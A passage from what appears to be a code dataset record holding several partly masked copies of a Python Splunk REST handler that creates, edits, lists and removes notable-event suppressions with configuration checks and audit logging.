Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n logger.info(\n 'Refreshing suppression configurations via properties endpoint')\n try:\n refreshInfo = entity.refreshEntities('properties/eventtypes',\n sessionKey=self.getSessionKey())\n except Exception as e:\n logger.warn(\n 'Could not refresh suppression configurations via properties endpoint: %s'\n , str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleEdit(self, confInfo):\n \"\"\"\n Handles edits to the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs\n if name is not None:\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention'\n )\n try:\n conf = entity.getEntity('saved/eventtypes', name,\n sessionKey=self.getSessionKey())\n except ResourceNotFound:\n raise admin.NotFoundException(\n \"A suppression configuration with the given name '%s' could not be found\"\n % name)\n else:\n raise admin.ArgValidationException('No name provided')\n log_data = {'status': 'success', 'action': 'edit', 'signature':\n 'Notable event suppression successfully saved', 'suppression':\n name[len(NotableEventSuppression.SUPPRESSION_START):], 'user':\n conf['eai:userName']}\n for key, val in conf.items():\n if key in args.data:\n new_value = args[key][0]\n if new_value in [None, '']:\n new_value = ' '\n if key == self.PARAM_DISABLED:\n conf_key = util.normalizeBoolean(conf[key],\n enableStrictMode=True)\n new_value = util.normalizeBoolean(new_value,\n enableStrictMode=True)\n if conf_key != new_value:\n log_data['action'\n ] = 'disable' if new_value else 'enable'\n log_data['signature'] = (\n 'Suppression successfully disabled' if\n new_value else 'Suppression successfully enabled')\n conf[key] = new_value\n if key == admin.EAI_ENTRY_ACL:\n for k, v in self.CONF_KEY_MAPPING.iteritems():\n if k in val and val[k] is not None and len(val[k]) > 0:\n setattr(conf, v, val[k])\n if conf.namespace is None or len(conf.namespace) == 0:\n conf.namespace = Suppressions.DEFAULT_NAMESPACE\n if conf.owner is None or len(conf.owner) == 0:\n conf.owner = Suppressions.DEFAULT_OWNER\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The edit attempt for the suppression '%s' produced an invalid configuration: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n if log_data['action'] == 'edit':\n log_data['signature'] = 'Unable to save the event suppression'\n elif log_data['action'] == 'enable':\n log_data['signature'\n ] = 'Error occurred while enabling the suppression: ' + str(\n e)\n else:\n log_data['signature'\n ] = 'Error occurred while disabling the suppression: ' + str(\n e)\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info(\"Successfully updated the '%s' suppression\", name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleRemove(self, confInfo):\n owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id,\n namespace=self.appName, owner=owner, sessionKey=self.\n getSessionKey())\n\n @staticmethod\n def checkConf(settings, stanza=None, confInfo=None,\n throwExceptionOnError=False):\n \"\"\"\n Checks the settings and raises an exception if the configuration is invalid.\n \"\"\"\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n if stanza is not None and confInfo is not None:\n for key, val in settings.items():\n if val is None:\n val = ''\n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n else:\n pass\n logger.info(\"Checking general settings for the '%s' suppression\",\n stanza)\n for key, val in settings.items():\n if val is None:\n val = ''\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n except ValueError:\n raise InvalidParameterValueException(key, val,\n 'must be a valid boolean')\n elif key in Suppressions.REQUIRED_PARAMS:\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n elif key in Suppressions.VALID_PARAMS:\n pass\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n elif throwExceptionOnError:\n raise UnsupportedParameterException()\n else:\n logger.warn(\n \"The configuration for '%s' contains an unsupported parameter: %s\"\n , stanza, key)\n if len(required_fields) > 0:\n raise InvalidConfigException(\n 'The following fields must be defined in the configuration but were not: '\n + ', '.join(required_fields).strip())\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass UnsupportedParameterException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that is unsupported.\n \"\"\"\n pass\n\n\nclass MissingTransitionException(InvalidConfigException):\n \"\"\"\n Describes a capability that is missing.\n \"\"\"\n\n def __init__(self, transitions):\n self.transitions = transitions\n super(InvalidConfigException, self).__init__(\n 'Missing transition detected')\n\n\n<mask token>\n\n\nclass Suppressions(admin.MConfigHandler):\n \"\"\"\n Set up supported arguments\n \"\"\"\n REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4':\n 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32':\n 'ACTION_RELOAD'}\n WRITE_CAPABILITY = 'edit_suppressions'\n PARAM_DISABLED = 'disabled'\n PARAM_SEARCH = 'search'\n PARAM_DESCRIPTION = 'description'\n VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]\n REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]\n CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}\n DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'\n DEFAULT_OWNER = 'nobody'\n DEFAULT_DISABLED = 0\n\n def setup(self):\n logger.info('Setting up suppressions_rest_handler')\n self.setWriteCapability(Suppressions.WRITE_CAPABILITY)\n if (self.requestedAction == admin.ACTION_EDIT or self.\n requestedAction == admin.ACTION_CREATE):\n for arg in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addReqArg(arg)\n for arg in Suppressions.VALID_PARAMS:\n if arg not in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addOptArg(arg)\n\n def handleCreate(self, confInfo):\n \"\"\"Handles creation of a suppression.\"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs.data\n if not name or len(name) == 0:\n raise admin.ArgValidationException(\n 'The name of the suppression must not be empty')\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention')\n if name in self.readConf('eventtypes'):\n raise admin.AlreadyExistsException(\n 'A suppression entry already exists for %s' % name)\n disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)\n search = _getFieldValue(args, Suppressions.PARAM_SEARCH)\n description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)\n conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self\n .getSessionKey())\n conf.namespace = self.appName\n conf.owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n conf['name'] = name\n _addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)\n _addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)\n _addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)\n log_data = {'action': 'create', 'suppression': conf['name'][len(\n NotableEventSuppression.SUPPRESSION_START):], 'user': conf[\n 'eai:acl']['owner'], 'status': 'success', 'signature':\n 'Notable event suppression successfully created'}\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The configuration for the new suppression '%s' is invalid and could not be created: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n log_data['signature'] = 'Unable to save the event suppression'\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info('Successfully added suppression: %s', name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleCustom(self, confInfo):\n logger.info('Handling custom action: %s', self.customAction)\n if self.customAction == '_autodisable':\n expired_count, enabled_count = (NotableEventSuppression.\n disable_expired_suppressions(session_key=self.getSessionKey()))\n logger.info(\n '%s expired suppressions detected; %s were enabled (now disabled)'\n , expired_count, enabled_count)\n else:\n self.actionNotImplemented()\n\n def handleList(self, confInfo):\n \"\"\"\n Handles listing of a suppression\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n suppressionDict = self.readConfCtx('eventtypes')\n if suppressionDict != None:\n for stanza, settings in suppressionDict.items():\n stanzaMatch = NotableEventSuppression.suppressionRE.match(\n stanza)\n if stanzaMatch:\n try:\n Suppressions.checkConf(settings, stanza, confInfo)\n except InvalidConfigException as e:\n logger.error(\n \"The configuration for suppression '%s' is invalid: %s\"\n , stanza, str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleReload(self, confInfo=None, makeCSV=True):\n \"\"\"\n Handles refresh/reload of the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n logger.info(\n 'Refreshing suppression configurations via properties endpoint')\n try:\n refreshInfo = entity.refreshEntities('properties/eventtypes',\n sessionKey=self.getSessionKey())\n except Exception as e:\n logger.warn(\n 'Could not refresh suppression configurations via properties endpoint: %s'\n , str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleEdit(self, confInfo):\n \"\"\"\n Handles edits to the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs\n if name is not None:\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention'\n )\n try:\n conf = entity.getEntity('saved/eventtypes', name,\n sessionKey=self.getSessionKey())\n except ResourceNotFound:\n raise admin.NotFoundException(\n \"A suppression configuration with the given name '%s' could not be found\"\n % name)\n else:\n raise admin.ArgValidationException('No name provided')\n log_data = {'status': 'success', 'action': 'edit', 'signature':\n 'Notable event suppression successfully saved', 'suppression':\n name[len(NotableEventSuppression.SUPPRESSION_START):], 'user':\n conf['eai:userName']}\n for key, val in conf.items():\n if key in args.data:\n new_value = args[key][0]\n if new_value in [None, '']:\n new_value = ' '\n if key == self.PARAM_DISABLED:\n conf_key = util.normalizeBoolean(conf[key],\n enableStrictMode=True)\n new_value = util.normalizeBoolean(new_value,\n enableStrictMode=True)\n if conf_key != new_value:\n log_data['action'\n ] = 'disable' if new_value else 'enable'\n log_data['signature'] = (\n 'Suppression successfully disabled' if\n new_value else 'Suppression successfully enabled')\n conf[key] = new_value\n if key == admin.EAI_ENTRY_ACL:\n for k, v in self.CONF_KEY_MAPPING.iteritems():\n if k in val and val[k] is not None and len(val[k]) > 0:\n setattr(conf, v, val[k])\n if conf.namespace is None or len(conf.namespace) == 0:\n conf.namespace = Suppressions.DEFAULT_NAMESPACE\n if conf.owner is None or len(conf.owner) == 0:\n conf.owner = Suppressions.DEFAULT_OWNER\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The edit attempt for the suppression '%s' produced an invalid configuration: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n if log_data['action'] == 'edit':\n log_data['signature'] = 'Unable to save the event suppression'\n elif log_data['action'] == 'enable':\n log_data['signature'\n ] = 'Error occurred while enabling the suppression: ' + str(\n e)\n else:\n log_data['signature'\n ] = 'Error occurred while disabling the suppression: ' + str(\n e)\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info(\"Successfully updated the '%s' suppression\", name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleRemove(self, confInfo):\n owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id,\n namespace=self.appName, owner=owner, sessionKey=self.\n getSessionKey())\n\n @staticmethod\n def checkConf(settings, stanza=None, confInfo=None,\n throwExceptionOnError=False):\n \"\"\"\n Checks the settings and raises an exception if the configuration is invalid.\n \"\"\"\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n if stanza is not None and confInfo is not None:\n for key, val in settings.items():\n if val is None:\n val = ''\n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n else:\n pass\n logger.info(\"Checking general settings for the '%s' suppression\",\n stanza)\n for key, val in settings.items():\n if val is None:\n val = ''\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n except ValueError:\n raise InvalidParameterValueException(key, val,\n 'must be a valid boolean')\n elif key in Suppressions.REQUIRED_PARAMS:\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n elif key in Suppressions.VALID_PARAMS:\n pass\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n elif throwExceptionOnError:\n raise UnsupportedParameterException()\n else:\n logger.warn(\n \"The configuration for '%s' contains an unsupported parameter: %s\"\n , stanza, key)\n if len(required_fields) > 0:\n raise InvalidConfigException(\n 'The following fields must be defined in the configuration but were not: '\n + ', '.join(required_fields).strip())\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass InvalidParameterValueException(InvalidConfigException):\n <mask token>\n\n def __init__(self, field, value, value_must_be):\n message = (\n \"The value for the parameter '%s' is invalid: %s (was %s)\" % (\n field, value_must_be, value))\n super(InvalidConfigException, self).__init__(message)\n\n\nclass UnsupportedParameterException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that is unsupported.\n \"\"\"\n pass\n\n\nclass MissingTransitionException(InvalidConfigException):\n \"\"\"\n Describes a capability that is missing.\n \"\"\"\n\n def __init__(self, transitions):\n self.transitions = transitions\n super(InvalidConfigException, self).__init__(\n 'Missing transition detected')\n\n\n<mask token>\n\n\nclass Suppressions(admin.MConfigHandler):\n \"\"\"\n Set up supported arguments\n \"\"\"\n REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4':\n 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32':\n 'ACTION_RELOAD'}\n WRITE_CAPABILITY = 'edit_suppressions'\n PARAM_DISABLED = 'disabled'\n PARAM_SEARCH = 'search'\n PARAM_DESCRIPTION = 'description'\n VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]\n REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]\n CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}\n DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'\n DEFAULT_OWNER = 'nobody'\n DEFAULT_DISABLED = 0\n\n def setup(self):\n logger.info('Setting up suppressions_rest_handler')\n self.setWriteCapability(Suppressions.WRITE_CAPABILITY)\n if (self.requestedAction == admin.ACTION_EDIT or self.\n requestedAction == admin.ACTION_CREATE):\n for arg in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addReqArg(arg)\n for arg in Suppressions.VALID_PARAMS:\n if arg not in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addOptArg(arg)\n\n def handleCreate(self, confInfo):\n \"\"\"Handles creation of a suppression.\"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs.data\n if not name or len(name) == 0:\n raise admin.ArgValidationException(\n 'The name of the suppression must not be empty')\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention')\n if name in self.readConf('eventtypes'):\n raise admin.AlreadyExistsException(\n 'A suppression entry already exists for %s' % name)\n disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)\n search = _getFieldValue(args, Suppressions.PARAM_SEARCH)\n description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)\n conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self\n .getSessionKey())\n conf.namespace = self.appName\n conf.owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n conf['name'] = name\n _addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)\n _addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)\n _addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)\n log_data = {'action': 'create', 'suppression': conf['name'][len(\n NotableEventSuppression.SUPPRESSION_START):], 'user': conf[\n 'eai:acl']['owner'], 'status': 'success', 'signature':\n 'Notable event suppression successfully created'}\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The configuration for the new suppression '%s' is invalid and could not be created: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n log_data['signature'] = 'Unable to save the event suppression'\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info('Successfully added suppression: %s', name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleCustom(self, confInfo):\n logger.info('Handling custom action: %s', self.customAction)\n if self.customAction == '_autodisable':\n expired_count, enabled_count = (NotableEventSuppression.\n disable_expired_suppressions(session_key=self.getSessionKey()))\n logger.info(\n '%s expired suppressions detected; %s were enabled (now disabled)'\n , expired_count, enabled_count)\n else:\n self.actionNotImplemented()\n\n def handleList(self, confInfo):\n \"\"\"\n Handles listing of a suppression\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n suppressionDict = self.readConfCtx('eventtypes')\n if suppressionDict != None:\n for stanza, settings in suppressionDict.items():\n stanzaMatch = NotableEventSuppression.suppressionRE.match(\n stanza)\n if stanzaMatch:\n try:\n Suppressions.checkConf(settings, stanza, confInfo)\n except InvalidConfigException as e:\n logger.error(\n \"The configuration for suppression '%s' is invalid: %s\"\n , stanza, str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleReload(self, confInfo=None, makeCSV=True):\n \"\"\"\n Handles refresh/reload of the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n logger.info(\n 'Refreshing suppression configurations via properties endpoint')\n try:\n refreshInfo = entity.refreshEntities('properties/eventtypes',\n sessionKey=self.getSessionKey())\n except Exception as e:\n logger.warn(\n 'Could not refresh suppression configurations via properties endpoint: %s'\n , str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleEdit(self, confInfo):\n \"\"\"\n Handles edits to the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs\n if name is not None:\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention'\n )\n try:\n conf = entity.getEntity('saved/eventtypes', name,\n sessionKey=self.getSessionKey())\n except ResourceNotFound:\n raise admin.NotFoundException(\n \"A suppression configuration with the given name '%s' could not be found\"\n % name)\n else:\n raise admin.ArgValidationException('No name provided')\n log_data = {'status': 'success', 'action': 'edit', 'signature':\n 'Notable event suppression successfully saved', 'suppression':\n name[len(NotableEventSuppression.SUPPRESSION_START):], 'user':\n conf['eai:userName']}\n for key, val in conf.items():\n if key in args.data:\n new_value = args[key][0]\n if new_value in [None, '']:\n new_value = ' '\n if key == self.PARAM_DISABLED:\n conf_key = util.normalizeBoolean(conf[key],\n enableStrictMode=True)\n new_value = util.normalizeBoolean(new_value,\n enableStrictMode=True)\n if conf_key != new_value:\n log_data['action'\n ] = 'disable' if new_value else 'enable'\n log_data['signature'] = (\n 'Suppression successfully disabled' if\n new_value else 'Suppression successfully enabled')\n conf[key] = new_value\n if key == admin.EAI_ENTRY_ACL:\n for k, v in self.CONF_KEY_MAPPING.iteritems():\n if k in val and val[k] is not None and len(val[k]) > 0:\n setattr(conf, v, val[k])\n if conf.namespace is None or len(conf.namespace) == 0:\n conf.namespace = Suppressions.DEFAULT_NAMESPACE\n if conf.owner is None or len(conf.owner) == 0:\n conf.owner = Suppressions.DEFAULT_OWNER\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The edit attempt for the suppression '%s' produced an invalid configuration: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n if log_data['action'] == 'edit':\n log_data['signature'] = 'Unable to save the event suppression'\n elif log_data['action'] == 'enable':\n log_data['signature'\n ] = 'Error occurred while enabling the suppression: ' + str(\n e)\n else:\n log_data['signature'\n ] = 'Error occurred while disabling the suppression: ' + str(\n e)\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info(\"Successfully updated the '%s' suppression\", name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleRemove(self, confInfo):\n owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id,\n namespace=self.appName, owner=owner, sessionKey=self.\n getSessionKey())\n\n @staticmethod\n def checkConf(settings, stanza=None, confInfo=None,\n throwExceptionOnError=False):\n \"\"\"\n Checks the settings and raises an exception if the configuration is invalid.\n \"\"\"\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n if stanza is not None and confInfo is not None:\n for key, val in settings.items():\n if val is None:\n val = ''\n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n else:\n pass\n logger.info(\"Checking general settings for the '%s' suppression\",\n stanza)\n for key, val in settings.items():\n if val is None:\n val = ''\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n except ValueError:\n raise InvalidParameterValueException(key, val,\n 'must be a valid boolean')\n elif key in Suppressions.REQUIRED_PARAMS:\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n elif key in Suppressions.VALID_PARAMS:\n pass\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n elif throwExceptionOnError:\n raise UnsupportedParameterException()\n else:\n logger.warn(\n \"The configuration for '%s' contains an unsupported parameter: %s\"\n , stanza, key)\n if len(required_fields) > 0:\n raise InvalidConfigException(\n 'The following fields must be defined in the configuration but were not: '\n + ', '.join(required_fields).strip())\n\n\n<mask token>\n",
"step-4": "<mask token>\nif sys.platform == 'win32':\n import os, msvcrt\n msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)\n msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)\n msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)\n<mask token>\nsys.path.append(make_splunkhome_path(['etc', 'apps', 'SA-Utils', 'lib']))\n<mask token>\nlogger.setLevel(logging.INFO)\n\n\nclass InvalidConfigException(Exception):\n pass\n\n\nclass InvalidParameterValueException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that has an invalid value.\n \"\"\"\n\n def __init__(self, field, value, value_must_be):\n message = (\n \"The value for the parameter '%s' is invalid: %s (was %s)\" % (\n field, value_must_be, value))\n super(InvalidConfigException, self).__init__(message)\n\n\nclass UnsupportedParameterException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that is unsupported.\n \"\"\"\n pass\n\n\nclass MissingTransitionException(InvalidConfigException):\n \"\"\"\n Describes a capability that is missing.\n \"\"\"\n\n def __init__(self, transitions):\n self.transitions = transitions\n super(InvalidConfigException, self).__init__(\n 'Missing transition detected')\n\n\ndef _getFieldValue(args, name, default_value=None, max_length=None):\n \"\"\"Get the field value from the argument list.\"\"\"\n value = args[name][0] or default_value if name in args else default_value\n if value and max_length and len(value) > max_length:\n raise admin.ArgValidationException(\n 'App %s cannot be longer than %s character%s.' % (name,\n max_length, 's' if max_length > 1 else ''))\n return value\n\n\ndef _addToDictIfNonNull(d, name, value):\n \"\"\"Add the given name and value to the dictionary if the value is not none.\n \n Arguments:\n d -- the dictionary to add to\n name -- the name of the object to add\n value -- the value of the object to add (if not none)\n \"\"\"\n if value is not None:\n d[name] = value\n\n\nclass Suppressions(admin.MConfigHandler):\n \"\"\"\n Set up supported arguments\n \"\"\"\n REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4':\n 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32':\n 'ACTION_RELOAD'}\n WRITE_CAPABILITY = 'edit_suppressions'\n PARAM_DISABLED = 'disabled'\n PARAM_SEARCH = 'search'\n PARAM_DESCRIPTION = 'description'\n VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]\n REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]\n CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}\n DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'\n DEFAULT_OWNER = 'nobody'\n DEFAULT_DISABLED = 0\n\n def setup(self):\n logger.info('Setting up suppressions_rest_handler')\n self.setWriteCapability(Suppressions.WRITE_CAPABILITY)\n if (self.requestedAction == admin.ACTION_EDIT or self.\n requestedAction == admin.ACTION_CREATE):\n for arg in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addReqArg(arg)\n for arg in Suppressions.VALID_PARAMS:\n if arg not in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addOptArg(arg)\n\n def handleCreate(self, confInfo):\n \"\"\"Handles creation of a suppression.\"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs.data\n if not name or len(name) == 0:\n raise admin.ArgValidationException(\n 'The name of the suppression must not be empty')\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention')\n if name in self.readConf('eventtypes'):\n raise admin.AlreadyExistsException(\n 'A suppression entry already exists for %s' % name)\n disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)\n search = _getFieldValue(args, Suppressions.PARAM_SEARCH)\n description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)\n conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self\n .getSessionKey())\n conf.namespace = self.appName\n conf.owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n conf['name'] = name\n _addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)\n _addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)\n _addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)\n log_data = {'action': 'create', 'suppression': conf['name'][len(\n NotableEventSuppression.SUPPRESSION_START):], 'user': conf[\n 'eai:acl']['owner'], 'status': 'success', 'signature':\n 'Notable event suppression successfully 